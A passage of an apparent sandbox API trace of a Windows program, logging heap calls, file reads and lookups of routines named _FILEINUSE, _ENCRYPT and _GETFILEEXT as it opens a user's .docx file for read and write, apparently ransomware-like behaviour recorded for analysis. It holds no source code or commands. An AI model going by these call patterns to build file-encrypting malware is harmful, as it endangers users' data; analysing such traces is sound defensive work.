Size=0x18) returned 0x7ae928 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.084] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0033.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.085] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0033.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c50e0 [0033.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0033.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.086] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.087] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.087] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.087] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.087] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0033.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.088] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.088] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xea2, lpOverlapped=0x0) returned 1 [0033.088] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.088] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xea2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.088] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.089] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.090] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.090] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.090] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.090] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.090] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.090] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.090] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.090] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8898e0 [0033.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8898e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.091] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hpn6id3ln1n.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.091] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.091] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.091] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.091] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.092] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0033.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cc58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.092] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.092] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.092] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.092] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.092] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.092] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.092] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.092] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.093] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.093] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0033.093] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.093] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.093] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ea7d20, ftCreationTime.dwHighDateTime=0x1d57d7e, ftLastAccessTime.dwLowDateTime=0xfd67e2d0, ftLastAccessTime.dwHighDateTime=0x1d5666d, ftLastWriteTime.dwLowDateTime=0xfd67e2d0, ftLastWriteTime.dwHighDateTime=0x1d5666d, nFileSizeHigh=0x0, nFileSizeLow=0xa628, dwReserved0=0x0, dwReserved1=0x777648, cFileName="hPN6id3lN1N.docx", cAlternateFileName="HPN6ID~1.DOC")) returned 0x7c20c0 [0033.093] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.094] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0033.094] RtlAllocateHeap 